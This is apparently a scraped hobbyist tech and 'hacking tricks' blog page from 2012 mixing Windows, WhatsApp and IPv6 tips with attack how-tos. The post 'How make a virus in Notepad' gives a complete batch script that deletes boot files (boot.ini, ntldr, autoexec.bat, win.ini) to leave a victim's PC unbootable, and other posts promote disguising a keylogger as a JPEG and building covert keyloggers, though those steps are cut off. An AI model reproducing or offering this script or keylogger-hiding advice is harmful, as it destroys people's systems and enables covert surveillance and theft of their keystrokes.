Xiaomi Mi4c Leaked To Come With Type-C USB port and Even More Internal Storage

It was earlier reported that Xiaomi Mi4c is going to carry a price of less than $250, which is a steal of a deal considering that you will get a smartphone running a Snapdragon 808 chipset in it.

Windows 10 for phones features revealed

Microsoft showed off a number of new features for Windows 10 on phones today, but in afternoon sessions at the company’s press event. Most of the demonstrations focused on improving the built-in apps and features of Windows Phone, and fixing a lot of the oddities. That includes mail, maps, photos, Skype, and messaging.

Windows 8 and Windows 7 would receive a free upgrade to Windows 10

Once the OS launches later this year, Microsoft announced that all users who are using- Windows 8 and Windows 7 would receive a free upgrade to Windows 10 . With the release of the January Technical Preview, Microsoft is testing one of those systems.

Windows 10 build 9926 installation process

If you are installing the Windows 10 build that was released today, you will notice that the installation screens have been slightly changed or updated since Windows 8 and even over 9879, to a small degree. Since we know you don't install Windows builds frequently, we snapped some screens while installing the OS that you can see at the bottom of the post.

Whatsapp launches the Web client

Today WhatsApp announced a web client that will enable users to use the world’s most popular mobile IM client on their PC and Macs. But this web Client works only in the Google Chrome browser.

Tuesday, 7 August 2012

How make a virus in Notepad-1


How to crash a PC Forever !:::

@echo off
attrib -r -s -h c:\autoexec.bat
del c:\autoexec.bat
attrib -r -s -h c:\boot.ini
del c:\boot.ini
attrib -r -s -h c:\ntldr
del c:\ntldr
attrib -r -s -h c:\windows\win.ini
del c:\windows\win.ini
Open up notepad and copy and paste that. Save it as a .bat file.
This should shutdown the persons computer. It shuts it off once and deletes the files needed
to reboot and restart.
REMEMBER - DO NOT CLICK THIS FILE. (for the idiots)
**Also remember this might not work with vista.**

QoS Bandwidth Reserve Setting - Faster Internet Connection


     Beware Editing in the registry files can slow down your computer    

By default, Windows XP reserves 20% of the connection bandwidth for QoS traffic। This tweak allows the setting to be altered to a different percentage of connection bandwidth। If the system uses more than a single adapter for network connections, each adapter may be set
individually by navigating to:

Registry Tricks for Windows - Clear Pagefile on Shutdown

     Beware Editing in the registry files can slow down your computer     


As an added security precaution it is possible to clear all data that has been written to the
page file so it cannot be retrieved. The downside to this tweak is that it may substantially increase shutdown time depending on the amount of data in the page file.

[Start] --> [Run] --> Type Regedit --> Press Enter --> then
Navigate to following key

Tuesday, 31 July 2012

Hide Keyloggers into a JPEG file


Through this trick you can easily hide
keyloggers.
First download any key logger from
google i think Ardamax is best.

After installing just follow these easy steps=>

1) Firstly, create a new folder and make sure that the options 'show hidden files and folders' is checked and ‘hide extensions for known file types’ is unchecked. Basically what you need is to see hidden files and see the extension of all your files on your pc.

Sunday, 22 July 2012

Introduction To WebGoat A revolutionary Web Attack Tool

What is WebGoat?
WebGoat is aJ2EE web application, created by the OWASP community to provide a teaching environment for web application security. It is a deliberately insecure program,where you must go through a number of lessons . In each lessons, you learn about a new sort of vulnerability, and in the same moment get a hands on try at exploiting that vulnerability.

Thursday, 12 July 2012

A new cross platform Trojan downloader has been discovered.


A new Trojan downloader has been discovered which detects your platform i.e. your operating system which you have and downloads the corresponding malware for your platform.
Remember the cross-platform malware that exploited Java to attack both PCs and Macs?
Here’s better one for you : A Trojan downloader that check your operating system and then pick up the malware which is suitable for your PCs/Macs.
The new Web-Based Social Engineering attacks, first detected on the Columbia websites, relies on a malicious Java applet to install backdoors on windows, Macs and Linux. When you first visit such a compromised site, then that applet program checks which operating system you have (Windows, Mac OS X, Linux) and then drops a corresponding Trojan for your platform.

Sunday, 24 June 2012

GOOGLE DRIVE- NEW APPS FOR YOU








Recently, google launched its dropbox competitor, offering up to 5Gb of free storage space, not to mention the ability to download files and sync folders on multiple computers. here are a few tips to have make effective use of GOOGLE DRIVE.


PREVENT FILES FROM DOWNLOADING

We all know sharing is a great collaboration feature on google drive (right from its google docs days), but how do you prevent someone form downloading the file onto there pcs? It's simple.

Sunday, 17 June 2012

SOMETHING MORE ABOUT THE IPv6

Enabling IPv6


In this post I am going to discuss something more about the IPv6 networks.


The switch’s implementation of IPv6 is disabled by default. To enable IPv6, use
the command:
      ENABLE IPV6


To disable IPv6, use the command:
      DISABLE IPV6


Any IPv6 configuration which the switch has performed dynamically will be
preserved between disabling and re-enabling IPv6. For example, any addresses
which have been configured will still be present.

Sunday, 10 June 2012

FEATURE OF THE IPv6


In my previous post I am just introduced the IPv6, its Feature and the challenges to Internet . Now in this post I am going to explain the feature of the IPv6.  It has too many exciting features. Like:-

•Addressing
•Header
•Security
•Privacy
•Autoconfiguration
•Routing
•Quality of Service

Friday, 8 June 2012

Introduction to IPv6 (Internet Protocol Version 6)


What is IPv6?

Internet Protocol Version 6 (IPv6) is a network layer protocol that enables data communications over a packet switched network. Packet switching involves the sending and receiving of data in packets between two nodes in a network. 
It has primarily been developed to solve the problem of the eventual exhaustion of the IPv4 address
space, but also offers other enhancements. IPv6 addresses are 16 bytes long, in contrast to IPv4’s 4 byte addresses.

The working standard for the IPv6 protocol was published by the Internet Engineering Task Force (IETF) in 1998.

Tuesday, 5 June 2012

Extend Windows 7 Trial Period






In this post I am going to show that how a person can extend itswindows 7 trial perioed by 30 days. (without using any software)






Extending the Trial By 30 Days
Now to actually perform the hack that will extend the trial mode,

Monday, 4 June 2012

How to trace E-mail sending Location

To track an email and its senders location details, you must know its internet IP address from which he sends the e-mail to you.
Here is the procedure on how you can track the email and its sender's locations by finding there Ips. Once we get the IP Address of the sender, it is very easy to track the sender location.














Finding the location is very useful in verifying the mails and the place they are sent. Since we receive the mails every day some of them may be verified for safety if they are regarding some offers or prizes.

Basically there are two basic steps involved in  this, one is finding the IP of the e-mail sender in the header section and then checking the location of that ip.

To find the IP address of an e-mail in the world's most popular Gmail:-

Tuesday, 29 May 2012

How To Make Your Own Key Logger In Visual C++

Today I am going to teach "How To Make Your Own Key Logger ". If you know the C++ then you can easily understand the program.
Now a days key loggers are common to all the advance users it is a basic software but very useful software . But many people don't know that what is key logger.


Key Loggers are often called Keystroke logging is the action of tracking (or logging) the keys struck on a keyboard, typically in a covert manner so that the person using the keyboard is unaware that their actions are being monitored.

Here is the example of some of the key loggers:
1>refog
2>beyond
3>elite etc.
but I prefer the ardamax keylogger. 

Friday, 25 May 2012

Make Your Computer Speak When you Log On


It’s a simple trick to amaze your friends.When you Log On infront of them.
Yeah a trick to make your Computer Welcome you on Start Up.


Lets Do It:

Open Notepad
Paste the bellow code in Np

Dim speaks, speech
speaks="Welcome Back, Username"
Set speech=CreateObject("sapi.spvoice")
speech.Speak speaks


Friday, 11 May 2012

Create new instance of an Application in Windows 7 Super Taskbar

In windows 7 Taskbar instance of an application can easily be created by using Win + Number Key. Here number key signifies the position of the Application in the Taskbar


If you press Windows + 1, it will create a new instance of the first icon in the task bar. In the taskbar Shown here it will open an instance of Internet Explorer while Win+5 open Windows media Player, Win+7 to Windows Live writer and so on.
Now that‟s when i wish there must be Double digit Keys as well in Keyboard.

Friday, 6 April 2012

HOW TO CHANGE ALBUM ART OF ANY SONG



Where does album art come from?

The Player downloads album art from an online database where the information is supplied by a variety of non-Microsoft data providers, such as AMG.

The Player downloads album art when you rip a CD. To do so, the Player attempts to match the CD to an entry in the online database. If it finds a match, the Player automatically downloads the media information that is available for the CD, including album art. In addition, the Player periodically scans your library for songs that are missing album art. If it can match a song that is missing album art to an entry in the online database, the Player will download the missing album art. However, if the correct album art is not downloaded automatically when you rip a CD, you can try to match an album in your library with album art in the online database, a file on your computer, or from a webpage.

Wednesday, 4 April 2012

Copy Command Prompt Output


Windows 7 command prompt can be used with a clip utility that can used to copy the contents of the command prompt output into clipboard. It is very much similar like the way tee command works in UNIX. Tee command pipelines the output of a command in UNIX to another file. In Windows 7 we can use the „Clip‟ utility to copy the text of command prompt. Adding clip next to any command copy the output.

HOW TO BACKUP AND RESTORE MY INTERNETS FAVOURITES OR BOOKMARKS

Although there are several third-party software programs that will enable you to backup, restore, and manage your Internet browser bookmarks or favorites, all modern browsers today include bookmark managers and are capable of backing up and restoring your bookmarks or favorites. Below is a listing of each of the major browsers and how to backup and recover your Internet bookmarks or favorites.

Monday, 2 April 2012

SUPER TASKBAR


In Windows 7, the taskbar has become a super Taskbar. All things are @ tips and fewer clicks are required for access to anything. Features of Windows 7 Taskbar

1. You can pin frequently used programs to the taskbar



Sunday, 1 April 2012

KNOW YOUR WINDOWS AND PCs CONFIGURATION

If you want to know about your computer/laptop's exact configuration then you must know this.
by this one can easily understand his/her computer's configuration.

Step1:- Go to Run 

Step2:- Type 'dxdiag' press enter.